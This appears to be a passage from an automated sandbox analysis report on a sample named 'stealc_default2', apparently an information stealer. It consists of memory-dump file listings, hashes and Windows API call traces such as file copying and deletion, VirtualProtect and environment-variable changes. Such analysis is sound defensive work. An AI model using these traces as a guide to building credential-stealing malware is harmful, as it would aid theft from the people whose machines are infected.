                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                                                            • Opcode ID: d0157ece391441d9fcfc9b4cc217c20c77a90a90d7066b43d0afbe6e81dd3687
                                                                                                                                                                            • Instruction ID: ec5f812bb71d6b728ba154dc2f9b93b47aa87ed8d6fc08faec4775b9eebec176
                                                                                                                                                                            • Opcode Fuzzy Hash: d0157ece391441d9fcfc9b4cc217c20c77a90a90d7066b43d0afbe6e81dd3687
                                                                                                                                                                            • Instruction Fuzzy Hash: 320136B5A54208BBDB00DFD4DD89FAEB7BCEB48711F008155FA0597280DA749A019F51
                                                                                                                                                                            APIs
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CFD968), ref: 0078079A
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CFD9C8), ref: 00780866
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CFD8F8), ref: 0078099D
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                            • String ID: `_x
                                                                                                                                                                            • API String ID: 3722407311-3563825831
                                                                                                                                                                            • Opcode ID: 77362d070b18b6105937ab2b2e5ba8b828acefa23b73e1c75b983b5608c69cfe
                                                                                                                                                                            • Instruction ID: 0cbb315e38f4a015bcc71d59229b2fe3260139721170db3f11b95cb704a1d687
                                                                                                                                                                            • Opcode Fuzzy Hash: 77362d070b18b6105937ab2b2e5ba8b828acefa23b73e1c75b983b5608c69cfe
                                                                                                                                                                            • Instruction Fuzzy Hash: EA916875A10208EFDF28FF64D995AED77B5FF94300F508519E8099F241DB38AA09CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CFD968), ref: 0078079A
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CFD9C8), ref: 00780866
                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,00CFD8F8), ref: 0078099D
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy
                                                                                                                                                                            • String ID: `_x
                                                                                                                                                                            • API String ID: 3722407311-3563825831
                                                                                                                                                                            • Opcode ID: 95ed21fc70dce1236e5221b1a1260685bd8113a7fc07dd2689a6456d78c4f9c2
                                                                                                                                                                            • Instruction ID: 1dbfeb3d49534b0c21818bbb609459a8661451f8859464c833e6b34600cbf2b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 95ed21fc70dce1236e5221b1a1260685bd8113a7fc07dd2689a6456d78c4f9c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 50818675A10208EFDF18FF64D995AEDB7B5FF94300F508119E8099B241DB34AA06CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00CFD718,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00780153), ref: 0077A0BD
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFBE48,?,?,?,?,?,?,?,?,?,?,?,00780153), ref: 0077A146
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
                                                                                                                                                                              • Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                            • SetEnvironmentVariableA.KERNEL32(00CFD718,00000000,00000000,?,007912D8,?,00780153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,00790AFE), ref: 0077A132
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps, xrefs: 0077A0B2, 0077A0C6, 0077A0DC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps
                                                                                                                                                                            • API String ID: 2929475105-3235701497
                                                                                                                                                                            • Opcode ID: a5d7e857d4f757e061429667c2d8e6bdc0ba5d8ae0ab163fd90e69c9f53915e0
                                                                                                                                                                            • Instruction ID: f84dd5a6e106d03227ebf42d9a74b634dbd2723c8f7ff639984ec6b2c93782a8
                                                                                                                                                                            • Opcode Fuzzy Hash: a5d7e857d4f757e061429667c2d8e6bdc0ba5d8ae0ab163fd90e69c9f53915e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C4175F1929204FFDB05EFA4EE89AAD33B4B748311F144229F509932A1DB3C5944DB63
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,@Jnw,@Jnw), ref: 00776C9F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                            • String ID: @Jnw$Jnw$Jnw
                                                                                                                                                                            • API String ID: 544645111-2813602956
                                                                                                                                                                            • Opcode ID: 8354e11fa50aea5a1bcce2566b32483a2cd9bba0a7f630ef1f374b81320c38f0
                                                                                                                                                                            • Instruction ID: 92201496d96acd6d6df0a9ed699ed6d47a35e4d809179b3112b6ef0aef75e1cb
                                                                                                                                                                            • Opcode Fuzzy Hash: 8354e11fa50aea5a1bcce2566b32483a2cd9bba0a7f630ef1f374b81320c38f0
                                                                                                                                                                            • Instruction Fuzzy Hash: 53210574A00608EFDB04CF89C584BAEBBF1FB48344F10C199D589AB345D739AA81DF90
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077A2E1
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0077A3FF
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077A6BC
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 00779E10: memcmp.MSVCRT(?,v20,00000003), ref: 00779E2D
                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0077A743
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 257331557-0
                                                                                                                                                                            • Opcode ID: acf9c20fdc3a716a204f5beb66452fcfbec5968b6925f8a50e7be50e6a365a37
                                                                                                                                                                            • Instruction ID: 5d36471068a2cfcfb9438a815681d851424fdc37f92f141b32d1465bbf752741
                                                                                                                                                                            • Opcode Fuzzy Hash: acf9c20fdc3a716a204f5beb66452fcfbec5968b6925f8a50e7be50e6a365a37
                                                                                                                                                                            • Instruction Fuzzy Hash: C0E1E572850118EAEB05FBA4DD9ADEE7378AF54300F50816AF51672091EF3C7A49CB72
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 00788B60: GetSystemTime.KERNEL32(?,00CF4C38,007905AE,?,?,?,?,?,?,?,?,?,00774963,?,00000014), ref: 00788B86
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0077D801
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077D99F
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0077D9B3
                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0077DA32
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
